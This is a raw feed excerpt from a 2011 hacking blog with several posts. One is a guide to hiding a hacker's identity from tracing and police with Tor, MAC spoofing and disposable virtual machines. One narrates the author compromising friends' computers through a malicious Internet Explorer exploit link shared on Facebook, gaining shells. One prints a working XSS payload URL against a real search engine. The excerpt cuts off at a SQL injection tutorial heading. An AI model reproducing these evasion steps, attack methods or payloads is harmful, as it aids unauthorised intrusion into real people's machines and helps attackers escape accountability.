for me. Today I have an interesting post for you all. In one of my several older posts I have been discussing how to penetrate different websites, perform attacks, gain information etc. But there is a big issue behind all this.&lt;br /&gt;&lt;br /&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;While doing all these things we are putting our identity at stake. A real hacker always keeps his identity hidden and clears all tracks while dealing with such activities. Staying anonymous is a big kung-fu battle in this dangerous world of internet. 
So in this post I will try to solve this problem.&lt;br /&gt;&lt;br /&gt;Many of you might be aware of using &lt;a href=&quot;https://www.torproject.org/&quot; target=&quot;_blank&quot;&gt;TOR network&lt;/a&gt; as a way of staying anonymous but it is only half true. It does protect you to some extent but you need to add more efforts to keep yourself underground. In this tutorial we will learn how to setup a anonymous network using TOR virtual network and Virtual machines. So I am considering that you are aware of TOR and installing Virtual machines. I will be using Virtual box for this tutorial.&lt;br /&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;Note : If you use some other free VPN service then you can use it in place of TOR. Also If you have a paid VPN service then it will be an added&amp;nbsp;benefit&amp;nbsp;as it will provide you more anonymity and VPN bandwidth. In this tutorial I am using TOR as an example.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;We will start with our virtual machine. Suppose you have a Windows XP setup as a virtual machine. The first thing we have to do is to change the MAC address of the VM. To do this , go to the Virtualbox instance and select the Virtual machine, then click on SETTINGS. Move to the NETWORK tab. Choose the NAT adapter.&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://2.bp.blogspot.com/-ebgkr5o6vlk/TuDip4hwCfI/AAAAAAAAA8w/mCe8dBcKOGY/s1600/anon1.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;480&quot; src=&quot;http://2.bp.blogspot.com/-ebgkr5o6vlk/TuDip4hwCfI/AAAAAAAAA8w/mCe8dBcKOGY/s640/anon1.PNG&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Click on the ADVANCE drop down menu to list the MAC address. You will notice something similar to the &amp;nbsp;shown image. 
Now change this MAC address to some other value. keep in mind to keep the number of characters equal to 12 and use same number of alphabets and numbers.&lt;br /&gt;&lt;br /&gt;Once you are done with changing the MAC address, the next step will be to start your winXP virtual machine and setup the TOR network.&lt;br /&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;NOTE : In case you are using a wireless router then you can further enhance your anonymity by spoofing its MAC address first and then change the MAC for VM&#39;s NAT adapter.&amp;nbsp;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Now run your XP virtual machine and install TOR in it. TOR can be downloaded from&lt;a href=&quot;https://www.torproject.org/&quot; target=&quot;_blank&quot;&gt; here.&lt;/a&gt;&lt;br /&gt;After installing, run the program and wait till it connects to the tor network.&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://1.bp.blogspot.com/-GEIsDTMrYMM/TuDswYwtQNI/AAAAAAAAA84/Cgp_trtbllc/s1600/anon2.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;346&quot; src=&quot;http://1.bp.blogspot.com/-GEIsDTMrYMM/TuDswYwtQNI/AAAAAAAAA84/Cgp_trtbllc/s400/anon2.PNG&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Once the network is setup, it will automatically start firefox browser which you can use for anonymous surfing. 
Now there is another step you can do in order to prevent websites from tracking your activities by installing cookies.&lt;br /&gt;In the firefox instance, click on TOOLS, then click START PRIVATE BROWSING.&lt;br /&gt;This will further add anonymity to your activities.&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://4.bp.blogspot.com/-g_TvvtMhU6w/TuD0KwmGsLI/AAAAAAAAA9A/SRJF7e9mHjU/s1600/anon3.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;206&quot; src=&quot;http://4.bp.blogspot.com/-g_TvvtMhU6w/TuD0KwmGsLI/AAAAAAAAA9A/SRJF7e9mHjU/s400/anon3.PNG&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;What did just happen? Why a Virtual machine? Why not setup a tor network directly? Lots of questions. Let us address them.&lt;br /&gt;&lt;br /&gt;The reason why we are using a virtual machine in this tutorial is that it will be like building a virtual identity for you. Whenever you have to perform some private task then you can move to the virtual machine and when you have to do normal browsing then you can switch back to the host operating system.&lt;br /&gt;The other reason for using VM is that you can spoof its MAC address and in turn protect your real MAC address. This increases your anonymity as both the IP address and the MAC address are fake now.&lt;br /&gt;So the combination of VM and VPN makes it hard to trace you back.&lt;br /&gt;Further more its really easy to delete the complete virtual drive that you have created for installing Windows XP virtual machine and remove all traces. All your activities and logs will be deleted in a go( in case police raids you :-) ). 
Further more, before closing the virtual machine you can use a tool like &lt;a href=&quot;http://www.ccleaner.com/&quot; target=&quot;_blank&quot;&gt;ccleaner&lt;/a&gt;&amp;nbsp;to clean all your internet activities. It will delete the entire browing history, cookies, cache etc.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: red;&quot;&gt;There is an important point to&amp;nbsp;remember&amp;nbsp;while using this setup : Never use your real information on any website while browsing.&amp;nbsp;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;While using this setup make sure that you don&#39;t log into website using your real information. This is the reason why this&amp;nbsp;setup&amp;nbsp;seperates your real identity with your virtual identity while surfing the internet.&lt;br /&gt;I cant say too much about what is the reason for it but if you are a real hacker who is looking to hide his activities then you must be getting what I mean to say.&lt;br /&gt;Another thing that can truly turn you anonymous is by using a paid VPN service. They offer good bandwidth and great level of anonymity by bouncing and relaying connections multiple times. So if you use use a paid VPN in this setup then it will turn you completely anonymous.&lt;br /&gt;This is a completely unique post. I didn&#39;t find anything of this sort on the internet but I have been using this setup from quiet some time. If you have any queries about this post then add your comments here. There are still lots of ways by which you can improve this setup to make your completely&amp;nbsp;untraceable. I am still exploring it. I want you all to work with me and see if you can make improvements in this post. I will add changes as updates. 
Looking forward for suggestions.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;DARKLORD!!&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingalert.blogspot.com/feeds/6468968895363579875/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackingalert.blogspot.com/2011/12/complete-guide-to-staying-anonymous-on.html#comment-form' title='6 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/6468968895363579875'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/6468968895363579875'/><link rel='alternate' type='text/html' href='http://hackingalert.blogspot.com/2011/12/complete-guide-to-staying-anonymous-on.html' title='Complete Guide to staying Anonymous on Internet - Combining VMs and VPNs'/><author><name>abhinav singh</name><uri>http://www.blogger.com/profile/03102629587741077690</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://2.bp.blogspot.com/_MMJcoBRgsn4/SemPx5VvY3I/AAAAAAAAAA4/VZyEY96SW6o/S220/abhinavbom.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-hqHLI6fQe3Q/TuD538Q3CVI/AAAAAAAAA9I/JxxRQAewB44/s72-c/images.jpg" height="72" width="72"/><thr:total>6</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7708828398385990720.post-1137867959960765633</id><published>2011-12-05T00:56:00.000+05:30</published><updated>2011-12-05T00:56:45.074+05:30</updated><title type='text'>HackingAlert Enters Beta phase for Renewation</title><content type='html'>&lt;script src=&quot;http://connect.facebook.net/en_US/all.js#xfbml=1&quot;&gt;&lt;/script&gt;&lt;fb:like href=&quot;http://www.facebook.com/pages/HackingAlert/131456493581478&quot; layout=&quot;button_count&quot; show_faces=&quot;true&quot; 
width=&quot;450&quot; font=&quot;arial&quot;&gt;&lt;/fb:like&gt;&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://3.bp.blogspot.com/-I0DM-fRtiJU/TtvJIKqjUwI/AAAAAAAAA8o/2cQAAuBaPww/s1600/ha2.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://3.bp.blogspot.com/-I0DM-fRtiJU/TtvJIKqjUwI/AAAAAAAAA8o/2cQAAuBaPww/s1600/ha2.PNG&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;Hello friends. Yeas 2011 has been a very good &amp;nbsp;for HackingAlert. Especially the last 5 months. The blog has seen tremendous growth over this year. Lots of new reader and followers joined it and also encouraged me with their comments and suggestions. Day by day , month by month the traffic kept on growing and today HackingAlert is amongst the high ranked blogs in terms of hacking and network security.&lt;br /&gt;&lt;br /&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Change is not only the law of nature, its the law of web world as well. Change is necessary to eradicate the issues and shortcomings to make things more and more user friendly and rich. HackingAlert is also ready to move for a change. A change that will make it more fast, flexible and user friendly.&lt;br /&gt;&lt;br /&gt;HackingAlert has been operating on the same theme and layout style from past couple of years. There are lots of things which needs a new look and feel in the blog. HackingAlert is going to complete its 3 years of operation in January next year. So with the aim of bringing a better user experience, HA is entering into beta phase for the month of December. 
The blog will undergo complete over-hauling in this course of one month and lots of new features will be added.&lt;br /&gt;&lt;br /&gt;Some of the expected features that I am targeting for now are :&lt;br /&gt;&lt;br /&gt;&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;li&gt;Better layout and template style.&lt;/li&gt;&lt;li&gt;Better commenting options&lt;/li&gt;&lt;li&gt;Change in tab contents&lt;/li&gt;&lt;li&gt;Faster loading time&amp;nbsp;&lt;/li&gt;&lt;li&gt;Easier methods for social sharing of blog contents&lt;/li&gt;&lt;li&gt;Make it more content rich.&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;As for now these are the few things in my mind. I will request my readers to please provide suggestions which they feel should be brought in this blog. The biggest strength of any blog is its readers and their experience with it. So i will humbly request all my readers to add valuable suggestions in the comment box below to make HackingAlert a better place and leave a bigger impact in the year 2012.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingalert.blogspot.com/feeds/1137867959960765633/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackingalert.blogspot.com/2011/12/hackingalert-enters-beta-phase-for.html#comment-form' title='11 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/1137867959960765633'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/1137867959960765633'/><link rel='alternate' type='text/html' href='http://hackingalert.blogspot.com/2011/12/hackingalert-enters-beta-phase-for.html' title='HackingAlert Enters Beta phase for Renewation'/><author><name>abhinav singh</name><uri>http://www.blogger.com/profile/03102629587741077690</uri><email>noreply@blogger.com</email><gd:image 
rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://2.bp.blogspot.com/_MMJcoBRgsn4/SemPx5VvY3I/AAAAAAAAAA4/VZyEY96SW6o/S220/abhinavbom.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-I0DM-fRtiJU/TtvJIKqjUwI/AAAAAAAAA8o/2cQAAuBaPww/s72-c/ha2.PNG" height="72" width="72"/><thr:total>11</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7708828398385990720.post-2471473831990443587</id><published>2011-12-04T01:08:00.000+05:30</published><updated>2011-12-04T01:58:33.430+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="facebook hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="hacking tutorial"/><category scheme="http://www.blogger.com/atom/ns#" term="technical article"/><title type='text'>When Social Networks Become Social Engineering Tools for hacking - A Case study of hacking 10 Facebook friends in 10 minutes</title><content type='html'>&lt;script src=&quot;http://connect.facebook.net/en_US/all.js#xfbml=1&quot;&gt;&lt;/script&gt;&lt;fb:like href=&quot;http://www.facebook.com/pages/HackingAlert/131456493581478&quot; layout=&quot;button_count&quot; show_faces=&quot;true&quot; width=&quot;450&quot; font=&quot;arial&quot;&gt;&lt;/fb:like&gt; &lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://1.bp.blogspot.com/-Sm5JQN6Cc0E/TtqFTv7ihfI/AAAAAAAAA8U/cuEilsycR4k/s1600/logo.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;144&quot; src=&quot;http://1.bp.blogspot.com/-Sm5JQN6Cc0E/TtqFTv7ihfI/AAAAAAAAA8U/cuEilsycR4k/s320/logo.PNG&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;These days hacking community is buzzing 
with social engineering techniques for hacking. People discuss what can be the best social engineering technique they can adopt. These days I am addicted to 2 things very badly. One is metasploit and other is Social networks( facebook to be precise).&lt;br /&gt;&lt;br /&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;So I thought of mixing these two addictions of mine to craft a special Social engineered attack vector. I don&#39;t know whether anyone has ever thought or used this technique before but HackingAlert is certainly the first to report about it( If its not on google, its no where).&lt;br /&gt;&lt;br /&gt;In my attack vector I created a malicious url that exploited a known vulnerability of Internet explorer. Then I shared this link on social media through my account. Now here comes the concept of Social engineering. Since the malicious link is posted on my wall or in my tweet so everyone in my friend list or followers tends to trust it.&lt;br /&gt;They consider it as a normal link to some useful information. This is where the use of social mediums like Facebook becomes prankey.&lt;br /&gt;&lt;br /&gt;In my several posts I have always laid stress that we should not trust everything that appears in your feed or tweets. No matter if it is shared by our friend or&amp;nbsp;colleague. You should first examine it and see whether it looks suspicious or not. The best way is to Right click and copy the link and open it in a different browser. This will protect your social identity from any threat like spam or session hijacking etc. It does not protect the machine itself, though: a link that exploits a browser flaw is just as dangerous in the second browser unless that browser is fully patched.&lt;br /&gt;&lt;br /&gt;Let me give you a quick look at my attack vector. 
Here is the link that I shared on my wall which appeared in all my friend&#39;s feeds.&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://2.bp.blogspot.com/-6v27eVHibW4/Ttp-GTBqaUI/AAAAAAAAA8E/Yff54uZIZKo/s1600/hack1.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;227&quot; src=&quot;http://2.bp.blogspot.com/-6v27eVHibW4/Ttp-GTBqaUI/AAAAAAAAA8E/Yff54uZIZKo/s400/hack1.PNG&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;Immediately&amp;nbsp;after sharing this link, my friends started commenting and clicking on it. It is just a malicious link which can exploit a vulnerability in Internet Explorer and allow&amp;nbsp;arbitrary&amp;nbsp;code execution.&amp;nbsp;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;So all I had to do now is set up a&amp;nbsp;listener&amp;nbsp;for back connections and sit back and wait. It&#39;s exactly like catching a fish. You attach some food in the hook and wait for fish to come and eat it and in-turn get caught (hacked). &amp;nbsp;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;Look at the image below. Lots of IP addresses were reported in my console. Those who were lucky (not using IE) got rid of this attack. 
The error &quot;.net CLR not found&quot; represents those calls in which Internet explorer was not the browser in use.&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://1.bp.blogspot.com/-M5Ze2lxQY2Q/TtqAgZ22vxI/AAAAAAAAA8M/WPFleDJCGCQ/s1600/hack2.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;336&quot; src=&quot;http://1.bp.blogspot.com/-M5Ze2lxQY2Q/TtqAgZ22vxI/AAAAAAAAA8M/WPFleDJCGCQ/s640/hack2.PNG&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&amp;nbsp;If you notice the scroll bar in the right of the image then you can imagine how many back connection requests I got.&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;The lucky ones who were not using IE were safe but there were some unlucky ones as well. To be precise I got around 10 active sessions in first 10 minutes. And then I tweeted the link on twitter with a catchy statement. In an hour I had more active sessions than I can remember.&amp;nbsp;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;Successful execution of this attack vector provided me with a direct shell connectivity through which I could control the attacked users. 
It would be a cakewalk to start a key sniffer to record key strokes or, at worst, install backdoors (though I didn&#39;t do these things).&amp;nbsp;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;There is&amp;nbsp;something&amp;nbsp;serious I want to discuss here. If you have followed everything so far in this post then you might have figured out that there is hardly anything that Facebook can do to prevent this type of attack.&amp;nbsp;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;If my friend is using an unpatched version of IE browser and opens any link which appears in his social profile without giving it a second look then this is his mistake. It&#39;s like banging your own head on the wall.&amp;nbsp;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;So I will end this post with two conclusions which I want all my readers to follow strictly :&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;/div&gt;&lt;ol style=&quot;text-align: left;&quot;&gt;&lt;li&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;&lt;b&gt;Always use a fully updated version of your browser.&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;&lt;b&gt;Don&#39;t trust everything that people share on their social profiles.
You never know when you can become the FISH caught in the hook.&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ol&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;Note : If you are one of my friends who read this post and also clicked on the link which I shared then I am really sorry. I had to do this in order to build this post. But I have caused no harm to your system. It was purely educational purpose. Hope you are not offended.&amp;nbsp;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;DARKLORD!!&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' 
href='http://hackingalert.blogspot.com/feeds/2471473831990443587/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackingalert.blogspot.com/2011/12/when-social-networks-become-social.html#comment-form' title='10 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/2471473831990443587'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/2471473831990443587'/><link rel='alternate' type='text/html' href='http://hackingalert.blogspot.com/2011/12/when-social-networks-become-social.html' title='When Social Networks Become Social Engineering Tools for hacking - A Case study of hacking 10 Facebook friends in 10 minutes'/><author><name>abhinav singh</name><uri>http://www.blogger.com/profile/03102629587741077690</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://2.bp.blogspot.com/_MMJcoBRgsn4/SemPx5VvY3I/AAAAAAAAAA4/VZyEY96SW6o/S220/abhinavbom.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-Sm5JQN6Cc0E/TtqFTv7ihfI/AAAAAAAAA8U/cuEilsycR4k/s72-c/logo.PNG" height="72" width="72"/><thr:total>10</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7708828398385990720.post-871717903236906508</id><published>2011-12-03T02:05:00.001+05:30</published><updated>2011-12-03T02:34:46.642+05:30</updated><title type='text'>XSS vulnerability in Babylon search</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://2.bp.blogspot.com/-g18F3ezAoVs/Ttk6TfL4IDI/AAAAAAAAA78/5GSErN7UL9g/s1600/bab.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img 
border=&quot;0&quot; height=&quot;208&quot; src=&quot;http://2.bp.blogspot.com/-g18F3ezAoVs/Ttk6TfL4IDI/AAAAAAAAA78/5GSErN7UL9g/s320/bab.PNG&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Recently I installed some software which changed my default search in Firefox to Babylon search. It is a popular search engine and ranks high in Alexa. The search engine can be reached at&amp;nbsp;&lt;a href=&quot;http://search.babylon.com/home&quot;&gt;http://search.babylon.com/home&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;The search engine is vulnerable to a particular type of XSS attack. Since no one has reported a vulnerability in this search engine before, I can take the credit ( cool man! ) .&lt;br /&gt;&lt;br /&gt;The search engine can be XSSed by first adding a normal string at the beginning and then adding the script. The search engine has implemented XSS filtering, but the filter can be bypassed by crafting a different vector.&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://1.bp.blogspot.com/-YFvJ8PhbnqQ/Ttk386BMAmI/AAAAAAAAA7s/AITrZEBwAhc/s1600/xss.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;230&quot; src=&quot;http://1.bp.blogspot.com/-YFvJ8PhbnqQ/Ttk386BMAmI/AAAAAAAAA7s/AITrZEBwAhc/s400/xss.PNG&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;Notice the search term that I have used here.
On executing the script, an alert box will be displayed notifying the successful execution of script.&lt;br /&gt;Here is the complete vulnerable url :&lt;br /&gt;&lt;br /&gt;&lt;a href=&quot;http://search.babylon.com/?q=helloworld%3Cscript%3Ealert%28%27hackingalert%27%29%3B%3C%2Fscript%3Ehelloworld&amp;amp;babsrc=home&amp;amp;s=web&amp;amp;as=0&amp;amp;t=0&quot;&gt;http://search.babylon.com/?q=helloworld%3Cscript%3Ealert%28%27hackingalert%27%29%3B%3C%2Fscript%3Ehelloworld&amp;amp;babsrc=home&amp;amp;s=web&amp;amp;as=0&amp;amp;t=0&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://2.bp.blogspot.com/-obE6BzwDIm4/Ttk3-pwEC8I/AAAAAAAAA70/ntpVtMSISpw/s1600/xss1.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;401&quot; src=&quot;http://2.bp.blogspot.com/-obE6BzwDIm4/Ttk3-pwEC8I/AAAAAAAAA70/ntpVtMSISpw/s640/xss1.PNG&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingalert.blogspot.com/feeds/871717903236906508/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackingalert.blogspot.com/2011/12/xss-vulnerability-in-babylon-search.html#comment-form' title='11 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/871717903236906508'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/871717903236906508'/><link rel='alternate' type='text/html' href='http://hackingalert.blogspot.com/2011/12/xss-vulnerability-in-babylon-search.html' title='XSS vulnerability in Babylon search'/><author><name>abhinav 
singh</name><uri>http://www.blogger.com/profile/03102629587741077690</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://2.bp.blogspot.com/_MMJcoBRgsn4/SemPx5VvY3I/AAAAAAAAAA4/VZyEY96SW6o/S220/abhinavbom.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-g18F3ezAoVs/Ttk6TfL4IDI/AAAAAAAAA78/5GSErN7UL9g/s72-c/bab.PNG" height="72" width="72"/><thr:total>11</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7708828398385990720.post-2756732865095606856</id><published>2011-12-03T00:44:00.001+05:30</published><updated>2011-12-03T01:40:25.237+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="cracking"/><category scheme="http://www.blogger.com/atom/ns#" term="hack a website/web server"/><category scheme="http://www.blogger.com/atom/ns#" term="hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="hacking tutorial"/><category scheme="http://www.blogger.com/atom/ns#" term="sql injection tool"/><title type='text'>Complete SQL injection tutorial with Havij</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;script src=&quot;http://connect.facebook.net/en_US/all.js#xfbml=1&quot;&gt;&lt;/script&gt;&lt;fb:like font=&quot;arial&quot; href=&quot;http://www.facebook.com/pages/HackingAlert/131456493581478&quot; layout=&quot;button_count&quot; show_faces=&quot;true&quot; width=&quot;450&quot;&gt;&lt;/fb:like&gt;&lt;br /&gt;&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a 